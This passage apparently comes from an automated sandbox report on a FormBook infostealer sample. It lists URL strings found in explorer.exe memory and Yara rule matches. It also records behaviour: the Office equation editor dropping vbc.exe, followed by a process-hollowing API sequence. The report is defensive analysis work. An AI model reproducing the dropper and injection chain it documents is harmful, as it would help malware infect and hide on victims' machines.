          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2120167931.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000D.00000000.2119187998.0000000004226000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
          Source: explorer.exe, 0000000D.00000000.2111711384.0000000000231000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 0000000D.00000000.2111711384.0000000000231000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpJw
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2117838485.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000D.00000002.2369452220.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 0000000D.00000000.2130294878.0000000008313000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 0000000D.00000000.2119554654.00000000042CB000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 0000000D.00000000.2130596438.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041826A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_004182EB NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00730078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00730060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00731148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0073010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00731930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00730C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00731D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0072FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041826A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 11_1_004182EB NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFBB8 NtQueryInformationToken,LdrInitializeThunk,
